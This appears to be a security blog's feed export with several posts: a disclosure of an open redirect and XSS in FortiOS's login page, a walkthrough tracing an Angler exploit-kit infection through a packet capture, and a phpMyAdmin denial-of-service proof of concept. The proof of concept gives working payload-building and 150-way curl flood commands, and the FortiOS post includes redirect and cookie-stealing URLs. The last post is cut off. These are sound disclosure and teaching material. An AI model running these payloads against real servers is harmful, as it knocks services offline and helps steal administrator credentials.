tag:blogger.com,1999:blog-31604852479294816802024-02-17T00:48:36.751-08:00Hacking while you're asleepBehindTheFirewalls is a blog where you can find all the latest information about hacking techniques, new trends in IT security and the recent products offered by security manufacturers. We'll talk about Firewalls, IPS, Botnets...Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.comBlogger70125tag:blogger.com,1999:blog-3160485247929481680.post-6978489513431221002016-05-02T03:27:00.000-07:002016-05-02T03:31:46.752-07:00CVE-2016-3978 Open Redirect & XSS in FortiOS (Fortinet)<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
Some months ago, I reported to the Fortinet PSIRT team two vulnerabilities which affect different Fortigate firmware versions. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You probably know that "Fortinet is a leading provider of fast and secure cyber security solutions offers enterprise-level next generation firewalls and vast array of network security products."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As usual, I'm disclosing these vulnerabilities under responsible disclosure format which is (in my opinion) one of the best ways (in most cases) to publish technical details about a vulnerability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can find the Fortinet public advisory <a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I´d like to thank the spanish Fortinet team for helping me with the case by speeding it up.</div>
<h2 style="text-align: justify;">
Vulnerability Details</h2>
<h3>
Affected version</h3>
<div>
<ul>
<li><span style="text-align: justify;">5.0 branch: </span>5.0.12 or below</li>
<li><span style="text-align: justify;">5.2 branch: </span>5.2.2 or below</li>
</ul>
<div>
<br /></div>
<div>
*** <span style="text-align: justify;">4.3 and lower branches are not affected</span></div>
<div style="text-align: justify;">
</div>
</div>
<div>
<h3 style="text-align: justify;">
Open Redirect</h3>
<div>
<div style="text-align: justify;">
The <a href="https://www.owasp.org/index.php/Open_redirect" target="_blank">Open Redirect</a> is located in the Fortinet Fortigate web administration console.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Proof of concept:<br />
<br /></div>
<div style="text-align: justify;">
<ul>
<li>https://fortigate-management-ip-address/login?redir=http://evil-site</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
The parameter "redir" doesn't have implemented any kind of validation so I´m able to redirect the browser to any malicious web site from the Fortigate web login portal.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Case study example:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<ol>
<li style="text-align: justify;">An attacker sends a phishing email to the firewall administrator with the link bellow https://fortigate-management-ip-address/login?redir=http://evil-site (Previously the attacker should figure out the firewall management IP address).</li>
<li style="text-align: justify;">If the administrator clicks on the link, the real portal login will appear. The administrator is supposed to type the admin credentials.</li>
<li style="text-align: justify;">When the user/pwd are typed, the browser is redirected to the attacker evil-site where there is a fake Fortigate login portal. Credentials are asked for again due to an alleged erroneous user/password.</li>
<li style="text-align: justify;">The administrator retype the credencials, the evil-site receives the user/pwd and redirects the browser to the real firewall login portal.</li>
<li style="text-align: justify;">The administrator would type the credentials again and would get access to the real firewall. Meanwhile, the attacker has stolen the user/password.</li>
</ol>
</div>
</div>
<h3 style="text-align: justify;">
Cross Site Scripting</h3>
<div>
<div style="text-align: justify;">
<div>
The <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank">Cross Site Scripting</a> vulnerability is located in the Fortinet Fortigate web administration console.</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
<div style="text-align: justify;">
Proof of concept:<br />
<br /></div>
<div>
<ul>
<li style="text-align: justify;">https://fortigate-management-ip-address/login?redir=javascript:alert(document.cookie)</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcP37YSe0RX8L6U3uBtZuOuUlcXZyAQVO2ZzJJXpphnlGswCc1oiAy4Oxp5hVcdhmZ8fgv-28lYhcxnyA0ZY9P4tIA93LdUTgEN4jKDNAkIrwIeNpO7kkuZE4StjCg8tsj5Z2Ythigxc/s1600/xss-forti+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcP37YSe0RX8L6U3uBtZuOuUlcXZyAQVO2ZzJJXpphnlGswCc1oiAy4Oxp5hVcdhmZ8fgv-28lYhcxnyA0ZY9P4tIA93LdUTgEN4jKDNAkIrwIeNpO7kkuZE4StjCg8tsj5Z2Ythigxc/s640/xss-forti+%25281%2529.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: start;">
<div style="text-align: justify;">
<span style="text-align: start;">The parameter "redir" doesn't have implemented any kind of validation so we are able to execute javascript code in the victim browser.</span></div>
<h2 style="text-align: justify;">
Solutions</h2>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
Upgrade to one of the following FortiOS versions:<br />
<br /></div>
<div style="text-align: justify;">
<ul>
<li>5.0 branch: 5.0.13 or above</li>
<li>5.2 branch: 5.2.3 or above</li>
<li>5.4 branch: 5.4.0 or above</li>
</ul>
<div>
<br /></div>
</div>
</div>
<div style="text-align: justify;">
More details: <a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability</a></div>
</div>
<div>
<h2 style="text-align: justify;">
Conclusion</h2>
</div>
<div style="text-align: justify;">
Every single device or appliance placed in your network, even the ones that are part of the security of your infrastructure, would be affected by some vulnerability. We have seen how other well known vendors like Juniper, FireEye, Cisco, etc... were affected by similar vulnerabilities as well. This should be always kept in mind.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The vulnerabilities mentioned above are hard to exploit because the firewall administrator is supposed not to click on a link that forwards to their own firewall... But who knows... ;)<br />
<h2>
References</h2>
<div>
<div>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3978" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3978</a></div>
<div>
<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3978" target="_blank">https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3978</a></div>
<div>
<a href="http://www.securitytracker.com/id/1035332" target="_blank">http://www.securitytracker.com/id/1035332</a></div>
<div>
<a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability</a></div>
<div>
<a href="http://seclists.org/fulldisclosure/2016/Mar/68">http://seclists.org/fulldisclosure/2016/Mar/68</a></div>
</div>
<div>
<br /></div>
</div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-22200722704009947472015-12-13T14:55:00.002-08:002015-12-13T14:55:23.887-08:00A Network Traffic Analysis Exercise<div style="text-align: justify;">
Network forensics is something we should practice as much as possible to become faster at detecting supicious activies in our networks. This website <a href="http://malware-traffic-analysis.net/" target="_blank">http://malware-traffic-analysis.net/</a> shares network traffic captures where we can find different kinds of infections and malicious activies. I find these examples quite good to improve our skills to find evil behaviours... Also, we could be witness of new vectors attack and new evasion techniques...<br />
<br /></div>
<div style="text-align: justify;">
<div>
<div style="text-align: justify;">
Today, we are going to do the last exercise: </div>
<div style="text-align: justify;">
<a href="http://malware-traffic-analysis.net/2015/11/24/index.html" target="_blank">http://malware-traffic-analysis.net/2015/11/24/index.html</a></div>
</div>
<h2 style="text-align: justify;">
Malware infection</h2>
<div>
<div style="text-align: justify;">
In the post mentioned before, it was said that a malware was found in a corporate computer. We can get more information about that sample from diferent malware analysis.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
SHA256</div>
<div style="text-align: center;">
d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2</div>
</div>
<div>
<div style="text-align: center;">
<a href="https://malwr.com/analysis/ZTkxNzJiYmUyMTA2NGJhMmIwMzhhNjBkOTJmMmJhOGI/" target="_blank">malwr</a> <a href="https://www.virustotal.com/es/file/d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2/analysis/" target="_blank">Virustotal</a> <a href="https://www.file-analyzer.net/analysis/5789/16719/0/html" target="_blank">file-analyzer</a></div>
</div>
<h2>
Network traffic analysis</h2>
</div>
<div style="text-align: justify;">
<div>
To figure out what happend, we have to work with the traffic capture published at such blog post: <a href="http://malware-traffic-analysis.net/2015/11/24/2015-11-24-traffic-analysis-exercise.pcap" target="_blank">2015-11-24-traffic-analysis-exercise.pcap</a>. The first thing I´m going to do is to use tcpreplay in order to replicate the same traffic that was captured in an interface where my Suricata is listening with the latest ETPRO ruleset loaded.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4730j6olY11c3sdreum0O_iMjcIdTtk1mejmoi9FXPeFWJRGg2AOy8KvveAVscja-72yiUjZr-X9dz3Kx78PdP-wB5CEoRhaW6BaFMrxwgAHBX9-vo71_6gMj3-vollp_j2EKxuiCWPg/s1600/ek-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4730j6olY11c3sdreum0O_iMjcIdTtk1mejmoi9FXPeFWJRGg2AOy8KvveAVscja-72yiUjZr-X9dz3Kx78PdP-wB5CEoRhaW6BaFMrxwgAHBX9-vo71_6gMj3-vollp_j2EKxuiCWPg/s640/ek-1.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
After all the traffic has been replicated and analyzed, we can see on our alerts Dashboard that a computer could be affected by an Exploit Kit. Also, there are some CnC alerts...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsGAsUurnFRIx5JNCf28Gu7bS8KUZNezo9Abarh1PdAKHKb7Ib0xMOuU9ibF0p-CKAUYhUl_Zzj_-CmVLOjxcoWtm-S_Vjmkai4OuPTUmyw1hmaknHOTBth2DB4D9dtqYTsltAqgU4yAw/s1600/EK-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsGAsUurnFRIx5JNCf28Gu7bS8KUZNezo9Abarh1PdAKHKb7Ib0xMOuU9ibF0p-CKAUYhUl_Zzj_-CmVLOjxcoWtm-S_Vjmkai4OuPTUmyw1hmaknHOTBth2DB4D9dtqYTsltAqgU4yAw/s400/EK-3.png" width="400" /></a></div>
<br />
The first Angler EK alerts came from the website neuhaus-hourakus.avelinoortiz[.]com<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiW57L-xNRjRNc5LK8skXn313ClpSkfJNb5phm2nAAcjUdrPAYGJStLbM04Bp6ugcuD9pGgD6ieBdKXOeRFaR73pGvriP3eHyLF4tAAa1VV6X3oWLsplvBhyDZk1BPUuaI2lDLNGY1DvA/s1600/ek0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiW57L-xNRjRNc5LK8skXn313ClpSkfJNb5phm2nAAcjUdrPAYGJStLbM04Bp6ugcuD9pGgD6ieBdKXOeRFaR73pGvriP3eHyLF4tAAa1VV6X3oWLsplvBhyDZk1BPUuaI2lDLNGY1DvA/s640/ek0.png" width="640" /></a><br />
The order of the visits for that specific domain were:<br />
<br />
<ol>
<li>neuhaus-hourakus.avelinoortiz[.]com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=&note=C26Z8129ea&number=gcsXv8v&next=2unI-c8</li>
</ol>
<div>
We can see that this domain has been <a href="https://www.virustotal.com/es/domain/neuhaus-hourakus.avelinoortiz.com/information/" target="_blank">rated as malicious</a> by some webfiltering vendors. </div>
<div>
<br /></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyT_p1bxdAiCgGPrJYrUukwjwMyMqj4jniBURgXr41kvMpt0p7PR5g6h4rCuUzS5VcwPobS3pzLXb_cj8Xxb8ZIQSdnOeBBRl2zoyY8AfjchN-EtnKsPd92PaYqk0TIUbNXXlCaXM2yMk/s1600/vt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyT_p1bxdAiCgGPrJYrUukwjwMyMqj4jniBURgXr41kvMpt0p7PR5g6h4rCuUzS5VcwPobS3pzLXb_cj8Xxb8ZIQSdnOeBBRl2zoyY8AfjchN-EtnKsPd92PaYqk0TIUbNXXlCaXM2yMk/s640/vt2.png" width="640" /></a></div>
<div>
<br />
<div style="text-align: justify;">
I´ve also uploaded <a href="https://www.virustotal.com/es/file/07eef18fd4ef37e44bbf4530fe7ac5f96fa51b1002c53fc9ed6aa6dc42ed4706/analysis/" target="_blank">the PCAP to Virustotal</a> (look at Details section). Virustotal is awesome because the traffic is inspected by Snort-VTR and Suricata-ETPRO ruleset. Also Virustotal analizes all the requests and if something is detected by some Antivirus, Virustotal will warn us... We can see from the Virustotal report, that one of the first Suricata alerts related to the EK corresponds to a flash file which is related to an <a href="https://www.virustotal.com/es/file/470fdb11214c6d274bd0247d7845dc08e6d6d9e9a9c5edc65938c40ed2b0eeae/analysis/" target="_blank">Exploit</a>.</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd0y_0v_yxHy4KFiq6useyZ6Sfeo6Zx3PGL8wxtKvMTcPXgjoGstBa60-1LJOHI_TDPNrl5quP_P4Qkmra5_LNi3otGOt1ZSDsBGd23Bqvl425dFAFp4jB_o7y6SdoP8xvFPxDscPmuM/s1600/ek-vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd0y_0v_yxHy4KFiq6useyZ6Sfeo6Zx3PGL8wxtKvMTcPXgjoGstBa60-1LJOHI_TDPNrl5quP_P4Qkmra5_LNi3otGOt1ZSDsBGd23Bqvl425dFAFp4jB_o7y6SdoP8xvFPxDscPmuM/s640/ek-vt.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
It seems we´ve found where the user could have been infected, but... Why did the user end up at that website? If we look at the first Suricata event and we look closely at the Referer field, we can see that the web page that was visited before the landing page, had a Javascript.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNpeRIvtRYhfo27iItnOysnjz7_aWMEZOy4eYAQ-PLouqyAAtC0tyuIZjGae3Mi8MswJCs15pKTAmWiXCwOwe_UILlK1lEuRaqum3i0s1yYOFzXVXqppRvnjjklj57COKKXftVNUWtZzk/s1600/ek4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNpeRIvtRYhfo27iItnOysnjz7_aWMEZOy4eYAQ-PLouqyAAtC0tyuIZjGae3Mi8MswJCs15pKTAmWiXCwOwe_UILlK1lEuRaqum3i0s1yYOFzXVXqppRvnjjklj57COKKXftVNUWtZzk/s1600/ek4.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Digging into that Javascript, we can find an iframe which loads the EK landing page (1) and the website which loaded the Javascript (2).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLrwxqSAeruNLDGV5lgBFk5ATYrl0L7OulWtYJ0mpTccc08hUuusfSqvPCmnnemtWyWcvqrKAQqZoN9oz9wTaqY-m9d5TPt7QMDWKgSvJ7QAc25DlNyT_GTCOgH54Hnxch8XJQU3UIL7o/s1600/xEK10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLrwxqSAeruNLDGV5lgBFk5ATYrl0L7OulWtYJ0mpTccc08hUuusfSqvPCmnnemtWyWcvqrKAQqZoN9oz9wTaqY-m9d5TPt7QMDWKgSvJ7QAc25DlNyT_GTCOgH54Hnxch8XJQU3UIL7o/s400/xEK10.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
If we keep analyzing back with Wireshark, we can locate the URI which called the Javascript. It seems that it could be an advertisement (1) which loaded the Javascript (2).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQhOV3SqHiutlXF3sIG04uakdmzS5D6dxArK5xwUndg56SfSs3dMJNovg8dfIFLb2qyWszkQ0u7k3aJ6bn2Uck7so-r5kbX4kNznCd6jyo53y0qI4dSp9GUY1S_9ESHOMM_5KYYB9pkJw/s1600/ek112+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQhOV3SqHiutlXF3sIG04uakdmzS5D6dxArK5xwUndg56SfSs3dMJNovg8dfIFLb2qyWszkQ0u7k3aJ6bn2Uck7so-r5kbX4kNznCd6jyo53y0qI4dSp9GUY1S_9ESHOMM_5KYYB9pkJw/s400/ek112+%25281%2529.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And... Why did this user visit www.shotgunworld[.]com? If we look at the Referer field in the follow TCP Stream, we can see that the user was redirected to that website by Google. The user could have been doing Google searches...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBv6p0CGZyxdepnwcp0gFR6PgZda7zCDGVUe6N5EVyoBodbylDMqnUOEAqqd7LwxqTLxXKvp1MiHYwzZdZk51gQ813-I1nlWc0yxdMN_RhYbtThJr0tpUVt3u90-luMAPI2_SUa3xoQUU/s1600/ek12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBv6p0CGZyxdepnwcp0gFR6PgZda7zCDGVUe6N5EVyoBodbylDMqnUOEAqqd7LwxqTLxXKvp1MiHYwzZdZk51gQ813-I1nlWc0yxdMN_RhYbtThJr0tpUVt3u90-luMAPI2_SUa3xoQUU/s400/ek12.png" width="400" /></a></div>
<br />
If we dig a little bit deeper into the connections which were made before the Google redirection, we can see that the user was interested in guns. He did two searches in Google:<br />
<br />
1. http://www.google[.]com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwimz-OWuqnJAhWJrD4KHZcYBLsQFggcMAA&url=http%3A%2F%2Fwww.cabelas.com%2Fcategory%2FShotguns%2F105537780.uts&usg=AFQjCNHKLe8zX3xPg6B1t17pycMEn7CRFw&bvm=bv.108194040,d.dmo<br />
<br />
which redirects to http://www.cabelas.com/category/Shotguns/105537780.uts which <a href="https://www.virustotal.com/es/url/bd3cfd63798002edf44bd55992aca539540a170f54027efc63a51673e3fb6b32/analysis/1449506037/" target="_blank">seems not to be infected</a>.<br />
<br />
2. http://www.google[.]com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA&url=http%3A%2F%2Fwww.shotgunworld.com%2F&usg=AFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw&bvm=bv.108194040,d.dmo<br />
<br />
which loads the <a href="https://www.virustotal.com/es/url/f213e2607e3291835dc91c29988ad370f70dd39388770d9f9ab986204915ccd2/analysis/1449506000/" target="_blank">EK landing page</a>: neuhaus-hourakus.avelinoortiz[.]com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29<br />
<div>
<br />
<div style="text-align: justify;">
And... What about the landing page? I´ve followed with the analysis and I´ve found that it had code heavily obfuscated inside the HTML code.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjwgpFMoFPmQ0OIyoYU7VfFmIZcBQCXVBkfuuflR8Tyv743JmjJpSJLzr-qX8v-JPqIMrYa6cnapE_wOgtOEsHlQ0W0SG_0BKSIWP-uAy2EOICXcFfh9tcEeesZ2C3kVBVoCmXh4p3jE/s1600/ek2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjwgpFMoFPmQ0OIyoYU7VfFmIZcBQCXVBkfuuflR8Tyv743JmjJpSJLzr-qX8v-JPqIMrYa6cnapE_wOgtOEsHlQ0W0SG_0BKSIWP-uAy2EOICXcFfh9tcEeesZ2C3kVBVoCmXh4p3jE/s400/ek2.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
I´ve extracted it from the PCAP by using Wireshark and we can see the results at <a href="https://www.virustotal.com/es/file/d1f5e27ec192709e1e565bcf67d335442ab4191a107ab568a09793e0a12e72c5/analysis/1449601755/" target="_blank">Virustotal</a>. I´ve also uploaded it to <a href="http://pastebin.com/raw.php?i=i22fMrZB" target="_blank">Pastebin</a>. As it was said, this Javascript has been heavily obfuscated and trying to deobfuscate it would be time comsuming, but if you want to try yourself, you are really welcome. I would like to share some good blog posts where you can find more info about the Angler Exploit obfuscation: <a href="http://community.websense.com/blogs/securitylabs/archive/2015/02/05/angler-exploit-kit-operating-at-the-cutting-edge.aspx" target="_blank">Websense</a>, <a href="http://www.fuzzysecurity.com/tutorials/22.html" target="_blank">Fuzzysecurity</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Since we´ve not deobfuscated the Angler landing page code, we can not be 100% sure that it is related to the malware found in the computer, but I think we could assume that... After the host visited such URL, the computer started requesting suspicious URL related to botnet </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS4ferRJbmdHsNnCW6ibkpJVxHGl_CBNPGn4YD0fyWmtMGnxWC-GNcMKpMiczDp84R3dz722oR5Lo3OvO961_XC7rX5z9H8DV6b9Q5cxPf29qc1nzTqlQaB7zpq1RvJjVofRTYt8NwDzc/s1600/botnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS4ferRJbmdHsNnCW6ibkpJVxHGl_CBNPGn4YD0fyWmtMGnxWC-GNcMKpMiczDp84R3dz722oR5Lo3OvO961_XC7rX5z9H8DV6b9Q5cxPf29qc1nzTqlQaB7zpq1RvJjVofRTYt8NwDzc/s400/botnet.png" width="400" /></a></div>
<br />
Even the computer started requesting domain names that didn't get resolved...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3OXXVi044sFZLXYhKsSgYLOEdTY-K8k6I0YyDaEez_c11mlGSAMpXyRcDthH0bp11Y9Ivn4CDxbWrKGc9e1vaC9JMT_U06K6tHyxkeHBaqD4trZ08pXQluB3goP7gPVIwLq5spf4z8uQ/s1600/EK20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3OXXVi044sFZLXYhKsSgYLOEdTY-K8k6I0YyDaEez_c11mlGSAMpXyRcDthH0bp11Y9Ivn4CDxbWrKGc9e1vaC9JMT_U06K6tHyxkeHBaqD4trZ08pXQluB3goP7gPVIwLq5spf4z8uQ/s640/EK20.png" width="640" /></a></div>
<br />
Those domains could have been tried to be created by some domain generation algorithm (DGA). This could be a indicator that this computer had started to belong to a Botnet.<br />
<h2>
Conclusion </h2>
</div>
<div>
After being notified that a piece of malware has been detected on a corporate computer, we´ve analyzed the traffic capture provided and we´ve detected the following:</div>
<div>
<br /></div>
<div>
<ol>
<li>The user was doing Google searches related to guns.</li>
<li>After visiting some guns shops, he ended up in that web site: <span style="text-align: justify;">www.shotgunworld[.]com</span></li>
<li><span style="text-align: justify;">This one had an advertisment which loaded a Javascript.</span></li>
<li><span style="text-align: justify;">That Javascript had a iframe which loaded the Angler EK landing page.</span></li>
<li><span style="text-align: justify;">It seems the EK was successfull and the computer began to be part of a botnet.</span></li>
</ol>
<div style="text-align: justify;">
<br /></div>
</div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com1tag:blogger.com,1999:blog-3160485247929481680.post-60517720170930965362014-12-11T01:41:00.000-08:002014-12-11T01:41:10.505-08:00CVE-2014-9218 phpMyAdmin DoS Proof of Concept<div style="text-align: justify;">
Assuming that time enough has happened since the security update was
released by phpMyAdmin, we want to share our researches. As
you already know, we believe in Responsible Disclosure and that is the
reason why we didn't publish this post before.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can read the vulnerability details in the previous <a href="http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html" target="_blank">blog post</a>. In this one, we show you the way to exploit it.</div>
<br />
<u>1 - Create the payload.</u><br />
<br />
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload<br />
<div style="margin-left: 40px;">
<br /></div>
<u>2 - Performing the Denial of Service attack.</u><br /><br />$ for i in `seq 1 150`; do (curl --data @payload <a href="http://your-webserver-installation/phpmyadmin/" target="_blank">http://your-webserver-<wbr></wbr>installation/<span class="il">phpmyadmin</span>/</a> --silent > /dev/null &) done<br />
<br />
<br />
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-18558048822195143722014-12-03T08:33:00.000-08:002014-12-03T08:43:49.947-08:00When cookies lead to a DoS in phpMyAdmin CVE-2014-9218<h2>
Introduction</h2>
<div style="text-align: justify;">
"phpMyAdmin is a free software tool written in <a href="http://php.net/">PHP</a>,
intended to handle the administration of <a href="http://mysql.com/">MySQL</a>
over the Web. phpMyAdmin supports a wide range of operations on MySQL,
MariaDB and Drizzle. Frequently used operations (managing databases, tables,
columns, relations, indexes, users, permissions, etc) can be performed via the
user interface, while you still have the ability to directly execute any SQL statement."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Before starting with our findings, we would like to thank phpMyAdmin security team for their quick response and for their interest in keeping their software secure. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a> and me believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>, that is the reason why we have waited until a patch has been released by phpMyAdmin security team before revealing full details.</div>
<h2>
Affected Versions</h2>
Versions 4.0.x (prior to 4.0.10.7), 4.1.x (prior to 4.1.14.8) and 4.2.x (prior to 4.2.13.1) are affected.<br />
<br />
<span style="font-weight: normal;">More info:</span><br />
<br />
<ul>
<li><a href="http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php" target="_blank"><span style="font-weight: normal;">http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php</span></a> </li>
</ul>
<h2>
Vulnerability Details</h2>
<div style="text-align: justify;">
The phpMyAdmin vulnerability we are going to talk about is similar to, but a little bit different and more dangerous than the previous ones we posted some days ago: <a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">CVE-2014-9016</a> and <a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">CVE-2014-9034</a>. This post describes a <a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">Proof of Concept</a> about how to perform a Denial of Service by using long passwords which affects to the software mentioned above.<br />
<br />
Now, we have discovered that phpMyAdmin is vulnerable to the same attack but this time for a different reason...<br />
<br />
Why did we say more dangerous than the previous ones? In order to take advantage of this vulnerability in Drupal
and Wordpress, we needed to know a valid username before launching the
attack. In phpMyAdmin, <u>it is not required to know a valid username</u>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
